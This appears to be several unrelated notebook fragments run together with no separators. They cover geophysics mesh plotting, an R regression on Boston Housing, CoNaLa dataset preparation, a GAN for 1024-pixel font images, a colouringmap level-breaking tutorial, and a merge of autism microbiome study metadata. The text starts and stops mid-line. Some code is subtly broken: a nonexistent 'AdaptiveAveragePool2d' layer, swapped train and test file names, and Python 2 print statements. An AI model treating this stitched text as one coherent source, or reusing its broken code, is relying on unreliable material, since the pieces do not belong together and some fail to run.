area_copper / area inds_layer_near = ( (np.logical_and(mesh.gridCC[:,2]<0., mesh.gridCC[:,2]>-layer_thickness)) & (np.logical_and(mesh.gridCC[:,0]>-4, mesh.gridCC[:,0]<4)) & (np.logical_and(mesh.gridCC[:,1]>-43, mesh.gridCC[:,1]<43)) ) sigma[inds_layer_near] = 1./resistivity_near inds_layer = np.logical_and(mesh.gridCC[:,2]<0., mesh.gridCC[:,2]>-3) sigma[np.logical_and(inds, ~inds_air) & (inds_layer)] = sigma_rod * area_rod / area import matplotlib.pyplot as plt from matplotlib.colors import LogNorm from mpl_toolkits.axes_grid1 import make_axes_locatable import matplotlib matplotlib.rcParams['font.size'] = 14 import matplotlib as mpl from pylab import cm def discrete_cmap(N=4): """create a colormap with N (N<15) discrete colors and register it""" # define individual colors as hex values # cpool = ['#00FFFF', '#3CB371','#DAA520','#DC143C','#8A2BE2'] # cpool = ['white','green', 'orange', 'skyblue', 'red'] cpool = ['orange','green', 'skyblue', 'red', 'white'] cmap3 = mpl.colors.ListedColormap(cpool[0:N], 'indexed') cm.register_cmap(cmap=cmap3) return cmap3 geomap = discrete_cmap(N=5) ind_0 = sigma == np.unique(sigma)[0] ind_1 = sigma == np.unique(sigma)[1] ind_2 = sigma == np.unique(sigma)[2] ind_3 = sigma == np.unique(sigma)[3] ind_4 = sigma == np.unique(sigma)[4] pw_model = np.zeros_like(sigma) pw_model[ind_0] = 4 pw_model[ind_1] = 1 pw_model[ind_2] = 0 pw_model[ind_3] = 3 pw_model[ind_4] = 2 # sigma[mesh.gridCC[:,2]>0.] = np.nan fig, axs = plt.subplots(1,2, figsize=(10, 5)) clim = -0.5, 4.5 out = mesh.plotSlice( pw_model, grid=True, normal='X', pcolorOpts={'cmap':geomap}, ax=axs[0], clim=clim ) axs[0].set_xlim(-50, 50) axs[0].set_ylim(-50, 50) axs[0].set_aspect(1) axs[0].set_xlabel('y (m)') axs[0].set_ylabel('z (m)') axs[0].set_title(('(a) x=0.5m')) # axs[0].plot(xyz[:,1], xyz[:,2], 'k.') out = mesh.plotSlice( pw_model, grid=True, normal='Y', pcolorOpts={'cmap':geomap}, ax=axs[1], clim=clim ) axs[1].set_xlim(-50, 50) axs[1].set_ylim(-50, 50) axs[1].set_aspect(1) axs[1].set_xlabel('x (m)') axs[1].set_ylabel(' ') axs[1].set_title(('(b) y=0.5m')) # axs[1].plot(xyz[:,0], xyz[:,2], 'k.') cbaxes = fig.add_axes([1, 0.2, 0.02, 0.6]) cb = plt.colorbar( out[0], cax=cbaxes, orientation='vertical', ticks=[0, 1, 2, 3, 4], ) # cb.set_ticklabels(["Air", "Near-surface", "Background", "Ground electrode", "Copper wire"]) cb.set_ticklabels(["Background", "Ground pathway", "Ground electrode", "Copper wire", "Air"]) plt.tight_layout() fig.savefig("./figures/figure-7", dpi=200) # mesh.writeUBC('mesh.msh', models={'sigma.con':sigma})Boston Housing load data# load data dataset = read.csv('Boston_Housing.csv') dataset <- dataset[ -c(1) ] # drop the first column (index) # import library #install.packages('MLmetrics') library(caTools) library(MLmetrics) # to calculate cost function for modelsSplit datasetset.seed(2) # split data with ratio 75/25 split = sample.split(dataset$target, SplitRatio = 0.75) training_set = subset(dataset, split == TRUE) # Set True for train set test_set = subset(dataset, split == FALSE) # Set false for Test set head(training_set)Create linear model using all features# create regressor using all features regressor = lm(formula = target ~ ., data = training_set) # show the summary and coefficients for regressor cat("--------------------------------------------------\n") summary(regressor) cat("--------------------------------------------------\n") regressor$coefficients # use model to predict the y_test y_pred <- predict(regressor, newdata = test_set) y_actual <- test_set$target cat("--------------------------------------------------\n") cat("Linear Regression model using all features \nThe results for MAE: ",MAE(y_actual, y_pred), "\nThe results for MSE: ",MSE(y_actual, y_pred),"\n")--------------------------------------------------Create linear model using the most affected featuresregressor2 = lm(formula = target ~ ZN + RM +DIS ,data = training_set) # show the summary and coefficients for regressor cat("--------------------------------------------------\n") summary(regressor2) cat("--------------------------------------------------\n") regressor2$coefficients # use model to predict the y_test y_pred_2 <- predict(regressor2, newdata = test_set) cat("--------------------------------------------------\n") cat("Linear Regression model using the most affected features\nThe results for MAE: " ,MAE(y_actual, y_pred_2), "\nThe results for MSE: ",MSE(y_actual, y_pred_2),"\n")--------------------------------------------------© 2020 NokiaLicensed under the BSD 3 Clause licenseSPDX-License-Identifier: BSD-3-Clause Prepare Conala snippet collection and evaluation datafrom pathlib import Path import json from collections import defaultdict from codesearch.data import load_jsonl, save_jsonl corpus_url = "http://www.phontron.com/download/conala-corpus-v1.1.zip" conala_dir = Path("conala-corpus") conala_train_fn = conala_dir/"conala-test.json" conala_test_fn = conala_dir/"conala-train.json" conala_mined_fn = conala_dir/"conala-mined.jsonl" conala_snippets_fn = "conala-curated-snippets.jsonl" conala_retrieval_test_fn = "conala-test-curated-0.5.jsonl" if not conala_train_fn.exists(): !wget $corpus_url !unzip conala-corpus-v1.1.zip conala_mined = load_jsonl(conala_mined_fn)The mined dataset seems to noisy to incorporate in the snippet collection:!sed -n '10000,10009p;10010q' $conala_mined_fn with open(conala_train_fn) as f: conala_train = json.load(f) with open(conala_test_fn) as f: conala_test = json.load(f) conala_all = conala_train + conala_test conala_all[:2], len(conala_all), len(conala_train), len(conala_test) for s in conala_all: if s["rewritten_intent"] == "Convert the first row of numpy matrix `a` to a list": print(s) question_ids = {r["question_id"] for r in conala_all} intents = set(r["intent"] for r in conala_all) len(question_ids), len(conala_all), len(intents) id2snippet = defaultdict(list) for r in conala_all: id2snippet[r["question_id"]].append(r) for r in conala_all: if not r["intent"]: print(r) if r["intent"].lower() == (r["rewritten_intent"] or "").lower(): print(r) import random random.seed(42) snippets = [] eval_records = [] for question_id in id2snippet: snippets_ = [r for r in id2snippet[question_id] if r["rewritten_intent"]] if not snippets_: continue for i, record in enumerate(snippets_): snippet_record = { "id": f'{record["question_id"]}-{i}', "code": record["snippet"], "description": record["rewritten_intent"], "language": "python", "attribution": f"https://stackoverflow.com/questions/{record['question_id']}" } snippets.append(snippet_record) # occasionally snippets from the same question have a slightly different intent # to avoid similar queries, we create only one query per question query = random.choice(snippets_)["intent"] if any(query.lower() == r["description"].lower() for r in snippets[-len(snippets_):] ): print(f"filtering query {query}") continue relevant_ids = [r["id"] for r in snippets[-len(snippets_):] ] eval_records.append({"query": query, "relevant_ids": relevant_ids}) snippets[:2], len(snippets), eval_records[:2], len(eval_records) id2snippet_ = {r["id"]: r for r in snippets} for i, eval_record in enumerate(eval_records): print(f"Query: {eval_record['query']}") print(f"Relevant descriptions: {[id2snippet_[id]['description'] for id in eval_record['relevant_ids']]}") if i == 10: break from codesearch.text_preprocessing import compute_overlap compute_overlap("this is a test", "test test") overlaps = [] filtered_eval_records = [] for r in eval_records: query = r["query"] descriptions = [id2snippet_[id]['description'] for id in r['relevant_ids']] overlap = max(compute_overlap(query, d)[1] for d in descriptions) overlaps.append(overlap) if overlap < 0.5 : filtered_eval_records.append(r) filtered_eval_records[:2], len(filtered_eval_records) save_jsonl(conala_snippets_fn, snippets) save_jsonl(conala_retrieval_test_fn, filtered_eval_records)Light GAN 1024 Importimport os import cv2 as cv import numpy as np import torch import torch.nn as nn import torchvision from torch.autograd import Variable from torch.cuda.amp import autocast, GradScaler from torch.utils.data import Dataset, DataLoader from torchvision.utils import save_imageHyperparametersn_epochs = 100 # type=int, "number of epochs of training" batch_size = 10 # type=int, "size of the batches" lr = 0.0025 # type=float "adam: learning rate" b1 = 0.5 # type=float "adam: decay of first order momentum of gradient" b2 = 0.999 # type=float "adam: decay of first order momentum of gradient" num_gpu = 2 cuda = torch.cuda.is_available() latent_dim = 4 # type=int "dimensionality of the latent space" img_size = 1024 # type=int "size of each image dimension" channels = 1 # type=int "number of image channels" sample_interval = 10000 # int "interval betwen image samples" dataset_dir = r"C:\Users\Leo's PC\Documents\SSTP Tests\stylegan2-ada-pytorch\Font1024"Datasetsclass Dataset(Dataset): def __init__(self, file_dir, transform=None): self.dir = file_dir self.transform = transform self.diction = {} idx = 0 for filename in os.listdir(self.dir): if filename.endswith('png'): self.diction[idx] = filename idx += 1 def __len__(self): return len(self.diction) def __getitem__(self, idx): img_name = self.diction[idx] directory = self.dir + "\\" + str(img_name) image = cv.imread(directory, cv.IMREAD_GRAYSCALE) if self.transform: image = self.transform(image) return image dataset = Dataset(file_dir=dataset_dir)Dataloadersloader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True, drop_last=True)Model classesclass Generator(nn.Module): def __init__(self): super(Generator, self).__init__() #activation functions self.leackyrelu = nn.LeakyReLU(0.2) self.tanh = nn.Tanh() #upsampler self.upsamplerx4 = nn.Upsample(scale_factor=4) self.upsamplerx2 = nn.Upsample(scale_factor=2) self.pool = nn.AdaptiveMaxPool2d(output_size = 1024) #L1 self.conv1 = torch.nn.ConvTranspose2d(in_channels=512, out_channels=512, kernel_size=1, stride=1, padding=0, bias=True) self.norm1 = nn.BatchNorm2d(512) #L2 self.conv2 = torch.nn.ConvTranspose2d(in_channels=512, out_channels=256, kernel_size=5, stride=2, padding=2, bias=True) self.norm2 = nn.BatchNorm2d(256) #L3 self.conv3 = torch.nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=5, stride=2, padding=2, bias=True) self.norm3 = nn.BatchNorm2d(128) #L4 self.conv4 = torch.nn.ConvTranspose2d(in_channels=128, out_channels=64, kernel_size=5, stride=2, padding=2, bias=True) self.norm4 = nn.BatchNorm2d(64) #L5 self.conv5 = torch.nn.ConvTranspose2d(in_channels=64, out_channels=32, kernel_size=7, stride=2, padding=2, bias=True) self.norm5 = nn.BatchNorm2d(32) #L6 self.conv6 = torch.nn.ConvTranspose2d(in_channels=32, out_channels=channels, kernel_size=7, stride=2, padding=1, bias=True) self.norm6 = nn.BatchNorm2d(channels) @autocast() def forward(self, x): #L1 x = self.conv1(x) x = self.upsamplerx2(x) x = self.norm1(x) x = self.leackyrelu(x) #print(x.shape) #L2 x = self.conv2(x) x = self.upsamplerx2(x) x = self.norm2(x) x = self.leackyrelu(x) #print(x.shape) #L3 x = self.conv3(x) x = self.upsamplerx2(x) x = self.norm3(x) x = self.leackyrelu(x) #print(x.shape) #L4 x = self.conv4(x) x = self.norm4(x) x = self.leackyrelu(x) #print(x.shape) #L5 x = self.conv5(x) x = self.norm5(x) x = self.leackyrelu(x) #print(x.shape) #L6 x = self.conv6(x) #x = self.pool(x) x = self.norm6(x) x = self.tanh(x) return x def name(self): return "Generator" class Discriminator(nn.Module): def __init__(self): super(Discriminator, self).__init__() #activation functions self.leackyrelu = nn.LeakyReLU(0.2) self.sigmoid = nn.Sigmoid() self.softmax = nn.Softmax(dim=1) #L1 self.conv1 = nn.Conv2d(in_channels=channels, out_channels=32, kernel_size=3, stride=1, padding=1, bias=True) self.norm1 = nn.BatchNorm2d(32) self.pool1 = nn.AdaptiveMaxPool2d(output_size=512) #L2 self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1, bias=True) self.norm2 = nn.BatchNorm2d(64) self.pool2 = nn.AdaptiveMaxPool2d(output_size=256) #L3 self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, stride=1, padding=1, bias=True) self.norm3 = nn.BatchNorm2d(128) self.pool3 = nn.AdaptiveMaxPool2d(output_size=128) #L4 self.conv4 = torch.nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=1, padding=1, bias=True) self.norm4 = nn.BatchNorm2d(256) self.pool4 = nn.AdaptiveMaxPool2d(output_size=64) #L5 self.conv5 = nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding=1, bias=True) self.norm5 = nn.BatchNorm2d(512) self.pool5 = nn.AdaptiveMaxPool2d(output_size = 32) #L6 self.conv6 = nn.Conv2d(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding=1, bias=True) self.norm6 = nn.BatchNorm2d(1024) self.pool6 = nn.AdaptiveMaxPool2d(output_size=1) #L7 self.fc1 = nn.Linear(in_features=1024, out_features=512, bias=True) self.norm7 = nn.BatchNorm1d(512) self.dropout1 = nn.Dropout(p=0.5) #L8 self.fc2 = nn.Linear(in_features=512, out_features=2, bias=True) @autocast() def forward(self, x): #L1 x = self.conv1(x) x = self.norm1(x) x = self.leackyrelu(x) x = self.pool1(x) #print(x.shape) #L2 x = self.conv2(x) x = self.norm2(x) x = self.leackyrelu(x) x = self.pool2(x) #print(x.shape) #L3 x = self.conv3(x) x = self.norm3(x) x = self.leackyrelu(x) x = self.pool3(x) #print(x.shape) #L4 x = self.conv4(x) x = self.norm4(x) x = self.leackyrelu(x) x = self.pool4(x) #print(x.shape) #L5 x = self.conv5(x) x = self.norm5(x) x = self.leackyrelu(x) x = self.pool5(x) #print(x.shape) #L6 x = self.conv6(x) x = self.norm6(x) x = self.leackyrelu(x) x = self.pool6(x) x = x.view(x.shape[0], -1) #print(x.shape) #L7 x = self.fc1(x) x = self.norm7(x) x = self.dropout1(x) x = self.sigmoid(x) #print(x.shape) #L8 x = self.fc2(x) x = self.softmax(x) #print(x.shape) return x def name(self): return "Discriminator" class Discriminator_Res(nn.Module): def __init__(self): super(Discriminator_Res, self).__init__() self.prepool = nn.AdaptiveAveragePool2d(512, 512) self.ResNet = torchvision.models.resnet18(pretrained=True) self.ResNet.fc = nn.Linear(in_features=512, out_features=1, bias=True) @autocast() def forward(self, x): x = self.ResNet(x) return x def name(self): return "Discriminator_Res"Loss, Optimizer, Training setup# Loss function adversarial_loss = torch.nn.BCEWithLogitsLoss() # Initialize generator and discriminator G = Generator() D = Discriminator() def init_weights(m): if type(m) == nn.Linear or type(m) == nn.Conv2d or type(m) == nn.ConvTranspose2d: torch.nn.init.xavier_uniform_(m.weight) m.bias.data.fill_(0.01) G.apply(init_weights) D.apply(init_weights) device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu") G.cuda() D.cuda() adversarial_loss.cuda() G = torch.nn.DataParallel(G) D = torch.nn.DataParallel(D) optimizer_G = torch.optim.Adam(G.parameters(), lr=lr, betas=(b1, b2)) optimizer_D = torch.optim.Adam(D.parameters(), lr=lr, betas=(b1, b2)) scaler = GradScaler() Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensorTrainingfor epoch in range(n_epochs): g_loss_avg = 0 d_loss_avg = 0 for idx, imgs in enumerate(loader): # Adversarial ground truths valid = Variable(Tensor(np.array([[1, 0] for i in range(imgs.shape[0])])), requires_grad=False).cuda() fake = Variable(Tensor(np.array([[0, 1] for i in range(imgs.shape[0])])), requires_grad=False).cuda() # Configure input real_imgs = Variable(imgs.type(Tensor)).cuda().to(device) # ----------------- # Train Generator # ----------------- optimizer_G.zero_grad() # Sample noise as generator input latent_vector = Variable(Tensor(np.random.randn(imgs.shape[0], 512, latent_dim, latent_dim))).cuda() G.train() D.eval() with autocast(): gen_imgs = G(latent_vector) # Generate a batch of images g_loss = adversarial_loss(D(gen_imgs), valid) # Loss measures generator's ability to fool the discriminator scaler.scale(g_loss).backward() #back propagation with calculated loss scaler.step(optimizer_G) scaler.update() g_loss_avg = g_loss.item() if idx==0 else g_loss_avg * 0.99 + g_loss.item() * 0.01 # --------------------- # Train Discriminator # --------------------- D.train() optimizer_D.zero_grad() real_imgs.unsqueeze_(1) with autocast(): # Measure discriminator's ability to classify real from generated samples real_loss = adversarial_loss(D(real_imgs), valid) fake_loss = adversarial_loss(D(gen_imgs.detach()), fake) d_loss = (real_loss + fake_loss) / 2 scaler.scale(d_loss).backward() #back propagation with calculated loss scaler.step(optimizer_D) scaler.update() batches_done = epoch * len(loader) + idx d_loss_avg = d_loss.item() if idx==0 else d_loss_avg * 0.99 + d_loss.item() * 0.01 save_image(gen_imgs.data[:25], r"C:/Users/Leo's PC/Documents/SSTP Tests/Chinese Characters/LightGAN out/%d.png" % batches_done, nrow=5, normalize=True) print("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]" % (epoch, n_epochs, idx, len(loader), d_loss_avg, g_loss_avg)) checkpoint_file = open(r"C:/Users/Leo's PC/Documents/SSTP Tests/Chinese Characters/LightGAN out/G.tar", 'wb') torch.save({'model': G.state_dict()}, checkpoint_file) checkpoint_file.close() ''' checkpoint = torch.load(open("C:/Users/Leo's PC/Documents/SSTP Tests/Chinese Characters/LightGAN out/G.tar", 'rb')) G.load_state_dict(checkpoint['model']) '''Breaking a variable to levels The scenario for this tutorial is that, you have a series of a variable, such as the population density of different cities. And, you need to classify them into different groups according to this variable, e.g. the very high, medium high, medium, medium low, very low population density, etc.In some cases, you already have a GeoDataFrame/DataFrame, in other cases, you just have a list that contain the numbers. So, the following cover two major functions:1. tm.leveling_vector, which take a dataframe and a column name for the classifying; and2. bk.get_levels, which take a list.The two functions takes a break_method for the breaking methods, such as quantile(default), head_tail_break, natural_break, equal_interval (and manual).They take a break_N parameter, for specifying the number of groups.And they also take a break_cuts. First, import things that is needed.import geopandas as gpd # for reading and manupulating shapefile import matplotlib.pyplot as plt # for making figure import seaborn as sns # for making distplot from colouringmap import theme_mapping as tm # a function named leveling_vector in tm will be used from colouringmap import breaking_levels as bk # a function named get_levels in bk will be used # magic line for matlotlib figure to be shown inline in jupyter cell %matplotlib inlineread a demo file, and take a lookgrid_res = gpd.read_file('data/community_results.shp') grid_res.head()take a look at the data distribution. using seaborn distplot.sns.distplot(grid_res['usercount'], kde=False)the above plot showed that the data is potentially an exponential distribution.so lets try to make the yscale log.ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip')using different break method:1. quantile2. head_tail_break3. natural_break4. equal_interval the following is the most simple way of converting the column of a gdf to levelslevel_list, cuts = tm.leveling_vector(grid_res, 'usercount') #, break_method='quantile') #default method is quantileNormally, the level_list is used to be assign to the gdf. This is what I did in other functions of mapping.grid_res['user_level'] = level_list grid_res.head()cuts contain the breaking values, and the min/max at the both end of the list.cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count[0, 1, 2, 3, 4] [568, 585, 531, 550, 554]quantile has a similar count for each level. Lets try some other break method.level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break') print cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='natural_break') print cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='equal_interval') print cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count[0, 1, 2, 3, 4] [2713, 53, 12, 3, 7]specifying the number of level The number of level is set to the parameter break_N, which is default to 5.After setting the break_N to N, the number of cuts become N+1, because it contain both the largest and the smallest values.level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=3) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=5) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=7) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=9) print cuts[0.0, 111.01004304160689, 483.8207547169811, 1173.1554054054054, 2146.409090909091, 3247.6875, 3889.375, 4475.0, 4506.0, 4506.0]note that what head_tail_break do for increased number of levels. specifying cuts manually There are two ways of using the cuts. This will return a cut list, and a level_list that is in the same length and same sequence with the input vector. 1. using quantile as method, and the cuts are some float numbers betweent 0-1. 2. using manual as method, and the cuts are some user defined cuts. NOTE that the cut list has to include the minimum and maximum values.level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='quantile', break_cuts=[0.,.25,.5,.75,1.]) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='quantile', break_cuts=[0.,0.1,.5,.99,1.]) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='manual', break_cuts=[0.0, 120, 490, 1200, 2200, 4506.0]) print cuts[0.0, 0.0, 120, 490, 1200, 2200, 4506.0]breaking a list instead of a column of a dataframe Let say you have a list, instead of a dataframe/geodataframe.a_list = grid_res['usercount'].tolist()And you want to get the break levels, another function is also provided (the function that is called by tm.leveling_vector).level_list, cuts = bk.get_levels(a_list, method='head_tail_break', N=5) print cuts len(level_list)==len(a_list)ASD Meta-Analysis This notebook contains the steps to process and merge the metadata files from all studies together for combines study analyses#Import dependencies from qiime2 import Visualization import os import qiime2 as q2 import pandas as pd import seaborn as sns import matplotlib as mpl import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D import numpy as np import scipy from collections import Counter from sklearn.decomposition import PCA from sklearn.manifold import TSNE %matplotlib inline import warnings warnings.filterwarnings('ignore')Load Metadataamgut = pd.read_csv("./American_gut_metadata.txt",sep='\t',index_col=0) berding = pd.read_csv("./meta-berding.txt",sep='\t',index_col=0) cao = pd.read_csv("./meta-cao.txt",sep='\t',index_col=0) chen = pd.read_csv("./meta-chen.txt",sep='\t',index_col=0) dan = pd.read_csv("./meta-dan.txt",sep='\t',index_col=0) david = pd.read_csv("./meta-david.txt",sep='\t',index_col=0) huang = pd.read_csv("./meta-huang.txt",sep='\t',index_col=0) fouquier = pd.read_csv("./meta-fouquier.txt",sep='\t',index_col=0) kang = pd.read_csv("./meta-kang.txt",sep='\t',index_col=0) kong = pd.read_csv("./meta-kong.txt",sep='\t',index_col=0) liu = pd.read_csv("./meta-liu.txt",sep='\t',index_col=0) son = pd.read_csv("./meta-son.txt",sep='\t',index_col=0) zou = pd.read_csv("./meta-zou.txt",sep='\t',index_col=0) zurita = pd.read_csv("./meta-zurita.txt",sep='\t',index_col=0) amgut = amgut.drop(amgut.loc[amgut["Sex"]=="LabControl test"].index) all_meta = [amgut, berding, cao, chen, dan, david, huang, fouquier, kang, kong, liu, son, zou, zurita] all_meta_merged = pd.concat(all_meta) all_meta_merged all_meta_merged['Age'] = pd.to_numeric(all_meta_merged['Age'], errors='coerce')Define processing functionsdef add_age(row): if row['Age'] < 5 : return 'Below 5 years' if row['Age'] >= 5 and row['Age'] <= 7: return '5-7 years' if row['Age'] > 7: return 'Above 7 years' if row['Age'] == "Unknown": return "NaN" if row['Age'] == "NaN": return "NaN" else : return 'NaN' def sequencing_depth_min(row): if row['Study'] == "American Gut" : return 6000 if row['Study'] == "Berding2020" : return 14300 if row['Study'] == "Cao2021": return 5837 if row['Study'] == "Chen2020": return 18417 if row['Study'] == "Dan2020": return 26868 if row['Study'] == "David2021": return 5559 if row['Study'] == "Huang2021": return 14075 if row['Study'] == "Fouquier2021": return 20428 if row['Study'] == "Kang2017": return 5636 if row['Study'] == "Kong2019": return 18116 if row['Study'] == "Liu2019": return 22613 if row['Study'] == "Son2015": return 49184 if row['Study'] == "Zou2020": return 28246 if row['Study'] == "Zurita2019": return 5802 else : return "NaN" def sequencing_depth_range(row): if row['Study'] == "American Gut" : return "< 6000" if row['Study'] == "Berding2020" : return "< 6000" if row['Study'] == "Cao2021": return "< 6000" if row['Study'] == "Chen2020": return "> 1400" if row['Study'] == "Dan2020": return "> 1400" if row['Study'] == "David2021": return "< 6000" if row['Study'] == "Huang2021": return "> 1400" if row['Study'] == "Fouquier2021": return "> 1400" if row['Study'] == "Kang2017": return "< 6000" if row['Study'] == "Kong2019": return "> 1400" if row['Study'] == "Liu2019": return "> 1400" if row['Study'] == "Son2015": return "> 1400" if row['Study'] == "Zou2020": return "> 1400" if row['Study'] == "Zurita2019": return "< 6000" else : return 'NaN' def control_type_add(row): if row['Study'] == "American Gut" : return "No Relationship" if row['Study'] == "Berding2020" : return "No Relationship" if row['Study'] == "Cao2021": return "No Relationship" if row['Study'] == "Chen2020": return "Related" if row['Study'] == "Dan2020": return "No Relationship" if row['Study'] == "David2021": return "Related" if row['Study'] == "Huang2021": return "No Relationship" if row['Study'] == "Fouquier2021": return "Related" if row['Study'] == "Kang2017": return "No Relationship" if row['Study'] == "Kong2019": return "Related" if row['Study'] == "Liu2019": return "No Relationship" if row['Study'] == "Son2015": return "Related" if row['Study'] == "Zou2020": return "No Relationship" if row['Study'] == "Zurita2019": return "No Relationship" else : return 'NA' def Berding_Sample_Size(row): if row['Study'] == "Berding2020" : return 52 else : return row['Sample_size'] def Berding_Country(row): if row['Study'] == "Berding2020" : return "USA" if row['Study'] == "American Gut" : return "USA" if row['Study'] == "Kang2017" or row['Study'] == "kang" : return "USA" if row['Study'] == "Kong2019" or row['Study'] == "kong" : return "USA" else : return row['Country'] def samp_size(row): if row['Study'] == "American Gut" : return 532 if row['Study'] == "Berding2020" : return 52 if row['Study'] == "Cao2021": return 86 if row['Study'] == "Chen2020": return 123 if row['Study'] == "Dan2020": return 286 if row['Study'] == "David2021": return 135 if row['Study'] == "Huang2021": return 83 if row['Study'] == "Fouquier2021": return 78 if row['Study'] == "Kang2017": return 38 if row['Study'] == "Kong2019": return 45 if row['Study'] == "Liu2019": return 50 if row['Study'] == "Son2015": return 103 if row['Study'] == "Zou2020": return 96 if row['Study'] == "Zurita2019": return 50 else : return "NaN" all_meta_merged['Age_Range'] = all_meta_merged.apply (lambda row: add_age(row), axis=1) all_meta_merged['sequencing_depth_min'] = all_meta_merged.apply (lambda row: sequencing_depth_min(row), axis=1) all_meta_merged['seq_depth_range'] = all_meta_merged.apply (lambda row: sequencing_depth_range(row), axis=1) all_meta_merged['Control_relation'] = all_meta_merged.apply (lambda row: control_type_add(row), axis=1) all_meta_merged['Country'] = all_meta_merged.apply (lambda row: Berding_Country(row), axis=1) all_meta_merged['Sample_size'] = all_meta_merged.apply (lambda row: samp_size(row), axis=1) all_meta_merged['Sample_size'] = all_meta_merged.apply (lambda row: Berding_Sample_Size(row), axis=1) all_meta_merged.to_csv("Master_complete_metadata.txt",sep='\t') all_meta_merged['Study'].value_counts()Source truth metadata Load original unprocessed metadata filesamgut = pd.read_csv("./American_gut_metadata.txt",sep='\t',index_col=0) berding_source = pd.read_csv("../../Berding_2020/sample_metadata.txt",sep='\t',index_col=0) cao_source = pd.read_csv("../../Cao_2021/sample_metadata.txt",sep='\t',index_col=0) chen_source = pd.read_csv("../../Chen_2020/sample_metadata.txt",sep='\t',index_col=0) dan_source = pd.read_csv("../../Dan_2020/sample_metadata.txt",sep='\t',index_col=0) david_source = pd.read_csv("../../David_2021/sample_metadata.txt",sep='\t',index_col=0) huang_source = pd.read_csv("../../Huang_2021/sample_metadata.txt",sep='\t',index_col=0) fouquier_source = pd.read_csv("../../Fouquier_2021/sample_metadata.txt",sep='\t',index_col=0) kang_source = pd.read_csv("../../Kang_2017/sample_metadata_rf_kang.txt",sep='\t',index_col=0) kong_source = pd.read_csv("../../Kong_2019/sample_metadata.txt",sep='\t',index_col=0) liu_source = pd.read_csv("../../Liu_2019/sample_metadata.txt",sep='\t',index_col=0) son_source = pd.read_csv("../../Son_2015/sample_metadata.txt",sep='\t',index_col=0) zou_source = pd.read_csv("../../Zou_2020/sample_metadata.txt",sep='\t',index_col=0) zurita_source = pd.read_csv("../../Zurita_2019/sample_metadata.txt",sep='\t',index_col=0) kang_source = kang_source.drop(kang_source.loc[kang_source["collection-method"]=="swab"].index) amgut = amgut.drop(amgut.loc[amgut["Sex"]=="LabControl test"].index) zurita_source['Age'] = pd.to_numeric(zurita_source['Age'], errors='coerce') all_original = [amgut, berding_source, cao_source, chen_source, dan_source, david_source, huang_source, fouquier_source, kang_source, kong_source, liu_source, son_source, zou_source, zurita_source] all_original_merged = pd.concat(all_original) all_original_merged ground_truth = all_original_merged[['Age','Sex','Status','Study','Variable_Region','Control_Type','Cohort', 'Subjects_Location']]Define metadata formatting functionsdef country(row): if row['Study'] == "American Gut" : return "USA" if row['Study'] == "Berding2020" : return "USA" if row['Study'] == "Cao2021": return "China" if row['Study'] == "Chen2020": return "China" if row['Study'] == "Dan2020": return "China" if row['Study'] == "David2021": return "USA" if row['Study'] == "Huang2021": return "China" if row['Study'] == "Fouquier2021": return "USA" if row['Study'] == "Kang2017": return "USA" if row['Study'] == "Kong2019": return "USA" if row['Study'] == "Liu2019": return "China" if row['Study'] == "Son2015": return "USA" if row['Study'] == "Zou2020": return "China" if row['Study'] == "Zurita2019": return "Equador" else : return 'NaN' def Study(row): if row['Study'] == "Berding2020" : return row['Study'] if row['Study'] == "American Gut" : return row['Study'] else : return row['Cohort'] # Apply formatting columns to merged metadata file ground_truth['Age'] = pd.to_numeric(ground_truth['Age'], errors='coerce') ground_truth['Age_Range'] = ground_truth.apply (lambda row: add_age(row), axis=1) ground_truth['sequencing_depth_min'] = ground_truth.apply (lambda row: sequencing_depth_min(row), axis=1) ground_truth['seq_depth_range'] = ground_truth.apply (lambda row: sequencing_depth_range(row), axis=1) ground_truth['Control_relation'] = ground_truth.apply (lambda row: control_type_add(row), axis=1) ground_truth['Study'] = ground_truth.apply (lambda row: Study(row), axis=1) ground_truth['country'] = ground_truth.apply (lambda row: country(row), axis=1) ground_truth.index.name = '#SampleID' # Remove unwanted columns del ground_truth["Cohort"] del ground_truth["Subjects_Location"] ground_truthExport file to plot figure 1 in R studio.ground_truth.to_csv("ground_truth.txt", sep='\t')In this course, we'll largely be using smaller or 